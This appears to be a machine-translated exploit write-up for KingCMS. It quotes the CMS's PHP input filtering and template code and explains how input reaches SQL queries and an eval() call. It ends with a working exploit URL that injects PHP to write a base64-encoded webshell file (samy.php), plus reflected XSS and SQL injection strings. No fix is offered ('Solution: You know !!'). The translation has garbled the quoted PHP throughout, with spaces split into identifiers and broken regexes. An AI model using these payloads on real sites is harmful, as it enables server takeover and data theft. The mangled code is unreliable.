KingCmsSQL injection + Code Execution

Detailed description:
Function kc_pageLoad (){
If (KC_MAGIC_QUOTES_GPC ){
$ _ GET = kc_stripslashes_array ($ _ GET );
$ _ POST = kc_stripslashes_array ($ _ POST );
$ _ COOKIE = kc_stripslashes_array ($ _ COOKIE );
$ Array = array ('php _ SELF ', 'script _ URI', 'query _ string', 'path _ info', 'path _ TRANSLATED ');
Foreach ($ array as $ val ){
If (isset ($ _ SERVER [$ val])
$ _ SERVER [$ val] = htmlspecialchars ($ _ SERVER [$ val]);
// Here the programmer considers the problem of cross-site
For example, we submit a fuca. php/"> <script> alert (/Samy/) </script>
A reflected XSS
 
}
}

// Set the ismethod value to true: post; false: get
$ Ismethod = kc_post ('method ')? True: False;
$ GLOBALS ['ismethod'] =! ($ _ SERVER ['request _ method'] = 'get' | $ ismethod );
}

Www.2cto.com
Function kc_stripslashes_array (& $ _ data ){
If (is_array ($ _ data )){
Foreach ($ _ data as $ _ key =>$ _ value ){
$ _ Data [$ _ key] = kc_stripslashes_array ($ _ value );
}
Return $ _ data;
} Else {
Return stripslashes ($ _ data );
}
}
Decode addslashes

While removing escape characters, the program also facilitates our injection.

Therefore, the programmer also writes a function to obtain the values of the GET and POST arrays and call kc_validate.

Use a regular expression to match the value we submitted:

Function kc_get ($ name, $ type = 2, $ is = 0 ){
Global $ king;

$ Val = isset ($ _ GET [$ name])? $ _ GET [$ name]: '';
If (! Isset ($ val {0 }))
$ Val = isset ($ _ POST [$ name])? $ _ POST [$ name]: '';
If (isset ($ val {0 })){
If (kc_validate ($ val, $ type )){
$ _ Getid = $ val;
} Else {
Kc_error ($ king-> lang-> get
....

Kc_validate

Function kc_validate ($ s, $ _ type ){
Switch ($ _ type ){
Case 1: $ _ reg = '/^ [a-zA-Z0-9] + $/'; break;
Case 2: $ _ reg = '/^ [0-9] + $/'; break;
Case 3: $ _ reg = '/^ ([0-9 \.] + \,?) + $/'; Break;
Case 4: $ _ reg = '/^ [A-Za-z0-9 \ _] + $/'; break;
Case 5:
$ _ Reg = '/^ \ w + ([-+.] \ w +) * @ \ w + ([-.] \ w + )*\. \ w + ([-.] \ w +) * $/'; break;
Case 6:
// $ _ Reg = '/^ (http | https | ftp) :( \/| \\\\) ([\ w \/\ + \-~ '@: %]) + \.) + ([\ W \/\. \ = \? \ + \-~ '@\:! % #] | (&) | &) + /';
$ _ Reg = '/^ [a-zA-Z] {3, 10 }:\/ \/[^ \ s] + $ /';
Break;
Case 7:
Global $ king;
// $ _ Bool = in_array (kc_f_ext ($ s), explode ('|', $ king-> config ('upimg ')));
// Retrun $ _ bool;
$ _ Reg = '/^ ([a-zA-Z] {3, 10 }:\/\/)? [^ \ S] + \. ('. $ king-> config ('upimg'). ') $ /';
// $ _ Reg = '/^ (http | https | ftp) :( \/| \\\\) ([\ w \/\ + \-~ '@: %]) + \.) + ([\ W \/\. \ = \? \ + \-~ '@\:! % #] | (&) | &) + | ([\ W \/\. \ = \? \ + \-~ '@\':! % #] | (&) | &) +) \. ('. $ King-> config ('upimg'). ') $ /';
Break; // jpeg | jpg | gif | png | bmp
Case 8:
$ _ Reg = '/^ (1 [6-9] | [2-9] \ d) \ d {2})-(0? [1, 13578] | 1 [02])-(0? [1-9] | [12] \ d | 3 [01]) | (1 [6-9] | [2-9] \ d) \ d {2})-(0? [13456789] | 1 [012])-(0? [1-9] | [12] \ d | 30) | (1 [6-9] | [2-9] \ d) \ d {2 }) -0? 2-(0? [1-9] | 1 \ d | 2 [0-8]) | (1 [6-9] | [2-9] \ d) (0 [48] | [2468] [048] | [13579] [26]) | (16 | [2468] [048] | [3579] [26]) 00)-0? 2-29) (20 | 21 | 22 | 23 | [0-1]? \ D): [0-5]? \ D: [0-5]? \ D $/'; break;
Case 9:
$ _ Reg = '/^ (1 [6-9] | [2-9] \ d) \ d {2})-(0? [1, 13578] | 1 [02])-(0? [1-9] | [12] \ d | 3 [01]) | (1 [6-9] | [2-9] \ d) \ d {2})-(0? [13456789] | 1 [012])-(0? [1-9] | [12] \ d | 30) | (1 [6-9] | [2-9] \ d) \ d {2 }) -0? 2-(0? [1-9] | 1 \ d | 2 [0-8]) | (1 [6-9] | [2-9] \ d) (0 [48] | [2468] [048] | [13579] [26]) | (16 | [2468] [048] | [3579] [26]) 00)-0? 2-29) $/'; break;
Case 10: $ _ reg = '/^ \ d? \. \ D? \. \ D {4} $/'; break;
Case 13: $ _ reg = '/^ #? [0-9A-Fa-f] {6 }$/'; break;
Default: $ _ reg = $ _ type;
Case 22: $ _ reg = '/^ \-? [0-9] + $/'; break;
Case 23: $ _ reg = '/^ [a-zA-Z] [a-zA-Z0-9 \ _] */'; break;
Case 24: $ _ reg = '/^ [a-zA-Z0-9-_] + $/'; break;
Case 25: $ _ reg = '/[a-zA-Z0-9 \ + \ %] + (\ =) * $/'; break;
Case 33: $ _ reg = '/^ (\-? [0-9] + \,?) + $/'; Break;
Default: $ _ reg = $ _ type;
..

Code execution:

$ Tmp = $ t? $ T: $ this-> tmp;
If (substr ($ tmp, 0, 6) = '{Tags }'){
$ S = '<div style = "border: 5px solid # CCC; background: # EFEEEE; padding: 15px; line-height: 20px;"> ';
Foreach ($ this-> array as $ key => $ val ){
$ S. = "<tt >{king: $ key/} </tt>-& gt; $ val <br/> ";
}
$ S. = '</div> ';

} Else {
Kc_runtime ('template ');

$ S = preg_replace_callback ($ this-> parent, array (& $ this, 'regexcallback'), $ tmp );

Kc_runtime ('template', 1 );

}

 

$ Parent = '/<\? (Php )? (\ S *?) (. | \ N) + ?) \?> /Is ';

$ S = preg_replace_callback ($ parent, array (& $ this, 'regexphpcallback'), $ s );

Return $ s;
Public function regexphpcallback ($ m ){
$ Php = $ m [3];

If (isset ($ php )){
Ob_start ();
Eval ($ php );
$ S = ob_get_clean ();
}

Return $ s;
}


Because the id enters the Path, we submit l999999.9 or 1 = 1 to generate

 

Because the value is read from mysql, we cannot control it. We cannot construct webshell.

 

 

Code execution:

Http: // localhost/king/search. php? Query = facked ';?> <? Fputs (fopen ('samy. php', 'w'), base64_decode ('mtexpd9wahagqgv2ywwojf9qt1nuwydjbwqnxsk7pz4ymji = ');?> & Amp; modelid = 1 or 2 = 2

 

Solution: You know !!